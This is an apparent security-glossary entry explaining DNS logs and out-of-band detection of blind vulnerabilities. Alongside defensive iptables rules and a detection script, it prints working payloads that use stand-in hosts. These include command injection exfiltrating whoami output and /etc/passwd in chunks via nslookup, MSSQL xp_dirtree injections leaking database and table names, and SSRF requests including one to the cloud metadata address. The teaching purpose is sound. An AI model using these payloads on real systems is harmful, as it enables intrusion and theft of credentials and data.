Feb 26, 2026Security TestingIntermediateLanguage: English
DNS Log
IntermediatePersian version
A record of Domain Name System queries and responses, showing what domain names were looked up, when, and by whom. Used in security testing to detect blind vulnerabilities.
dnsloggingoobmonitoringblind
Short Definition
DNS logs show what domain names got looked up. In security testing, you use your own DNS server and watch its logs. When target server looks up your-unique-id.your-domain.com, that lookup appears in logs, proving your exploit worked even if you can't see direct output.
Full Definition
DNS logs are records of DNS resolution requests and responses, capturing queries made by systems when translating domain names to IP addresses.
What DNS logs contain:
- Query timestamp
- Source IP (who asked)
- Domain queried
- Query type (A, AAAA, TXT, etc.)
- Response given
- Response time
Example DNS log entry:
bash
12026-02-26 10:30:45 | Source: 192.168.1.100 | Query: api.example.com | Type: A | Response: 93.184.216.34
In security testing:
Setup your own DNS logger:
bash
1your-domain.com → Your VPS/DNS server
During tests, use unique subdomain:
bash
1test-abc123.your-domain.com
When target looks it up, log shows:
bash
1Query from 54.12.34.56 for test-abc123.your-domain.com
Popular tools:
- interactsh
- Burp Collaborator
- RequestBin
- Custom DNS servers (dnslib, python)
Why It Matters
For security testing:
- Detects blind vulnerabilities without direct output
- Confirms exploitation in filtered environments
- Works when HTTP requests are blocked
- Bypasses WAF and filtering
- Exfiltrates data via subdomain encoding
For defenders:
- Detects data exfiltration attempts
- Identifies compromised systems
- Monitors for C2 communication
- Finds unauthorized external connections
How Attackers Use It (and Ethical Testing)
Blind SSRF confirmation:
bash
1# Test payload2POST /api/image-fetch3{"url": "http://ssrf-test-xyz.your-domain.com/image.jpg"}45# Check DNS logs on your server6$ tail -f /var/log/dns-queries.log7Query from 52.1.2.3: ssrf-test-xyz.your-domain.com8# SSRF confirmed! Server made DNS lookup
Data exfiltration via DNS:
bash
1# Blind command injection2; nslookup `whoami`.data.your-domain.com34# DNS log shows:5Query: root.data.your-domain.com6# Exfiltrated username: root
SQL Injection OOB:
sql
1-- Extract database name via DNS2'; DECLARE @db VARCHAR(100);3SELECT @db = DB_NAME();4EXEC('master..xp_dirtree "\\' + @db + '.sqli.your-domain.com\a"');--56# DNS log:7Query: production_db.sqli.your-domain.com8# Database name: production_db
Multiple query encoding:
bash
1# Exfiltrate sensitive file2file_contents=$(cat /etc/passwd | base64)3for chunk in $(echo $file_contents | fold -w 50); do4 nslookup $chunk.exfil.your-domain.com5done67# DNS logs receive file in chunks
Setting up DNS logger:
python
1# Simple DNS logger2from dnslib import DNSRecord, RR, QTYPE, A3from dnslib.server import DNSServer4import logging56logging.basicConfig(level=logging.INFO)78class DNSLogger:9 def resolve(self, request, handler):10 reply = request.reply()11 qname = request.q.qname1213 # Log the query14 logging.info(f"DNS Query: {qname} from {handler.client_address[0]}")1516 # Return any IP (it doesn't matter for logging)17 reply.add_answer(RR(qname, QTYPE.A, rdata=A("1.2.3.4"), ttl=0))18 return reply1920server = DNSServer(DNSLogger(), port=53, address="0.0.0.0")21server.start()
How to Detect or Prevent It
Prevention (Defensive):
Network controls:
bash
1# Block outbound DNS except to trusted servers2iptables -A OUTPUT -p udp --dport 53 -d 8.8.8.8 -j ACCEPT3iptables -A OUTPUT -p udp --dport 53 -j DROP45# Use DNS firewall6# Allow only corporate DNS servers
Monitor DNS patterns:
python
1# Alert on suspicious patterns2def analyze_dns_query(query):3 # Unusually long subdomain4 if len(query) > 100:5 alert("Possible data exfiltration via DNS")67 # Random-looking subdomain8 if contains_base64_or_hex(query):9 alert("Encoded data in DNS query")1011 # Known OOB domains12 if any(pattern in query for pattern in ['burpcollaborator', 'interact.sh']):13 alert("Known security testing domain")1415 # Many queries to same unknown domain16 if query_frequency(domain) > 100:17 alert("Potential DNS tunneling")
Detection (as tester, watching your logs):
Analyze what you see:
bash
1# Check logs2grep "Query:" /var/log/dns.log34# Look for patterns:5- Source IP = target system IP? (confirms it's coming from target)6- Timing matches your test? (confirms correlation)7- Subdomain format matches payload? (confirms it worked)
Automated monitoring:
bash
1# Alert on new queries2tail -f /var/log/dns.log | while read line; do3 echo "[$(date)] New DNS query detected!"4 echo $line5 # Send notification6done
Common Misconceptions
- "DNS logging requires special setup" - Standard for most servers
- "Can't exfiltrate much via DNS" - 255 chars per label, multiple queries
- "DNS queries are encrypted" - Usually plaintext (unless DoH/DoT)
- "Blocking HTTP blocks everything" - DNS often still allowed
- "DNS logs don't matter" - Critical for detecting blind exploits
Real-World Example
DNS Exfiltration in APT Attack
bash
1# Malware encoded stolen data in DNS queries2# Pattern seen in logs:3454686973206973207365637265742064617461.exfil.attacker.com54d6f7265207365637265742064617461.exfil.attacker.com6...78# Base64 decoded: "This is secret data"9# Exfiltrated gigabytes over weeks via DNS
Bug Bounty - Blind SSRF Discovery
bash
1# Target: E-commerce platform2# Feature: Fetch product image from URL34# Payload:5POST /admin/fetch-image6{"url": "http://ssrf-12345.researcher.com/image.jpg"}78# DNS log on researcher's VPS:9[2026-02-26 10:30:12] Query from 54.xxx.xxx.xxx: ssrf-12345.researcher.com1011# Confirmed blind SSRF!12# Further testing with metadata service:13{"url": "http://169.254.169.254/"}1415# If metadata accessible, DNS log would show:16# (Some implementations make DNS query first)
Blind SQLi via DNS
sql
1-- Real pentest scenario2-- Target: Healthcare application3-- Vulnerability: Blind SQL injection in search parameter45-- Payload:6search=test';7DECLARE @v VARCHAR(8000);8SET @v = (SELECT TOP 1 table_name FROM information_schema.tables);9EXEC('master..xp_dirtree "\\'+@v+'.sqli.tester.com\a"');--1011# DNS log showed:12Query: patients.sqli.tester.com1314-- Confirmed SQL injection15-- Exfiltrated table name: "patients"16-- Further queries extracted more sensitive info
Related Terms
DNS, Out-of-Band, Blind SSRF, VPS, Data Exfiltration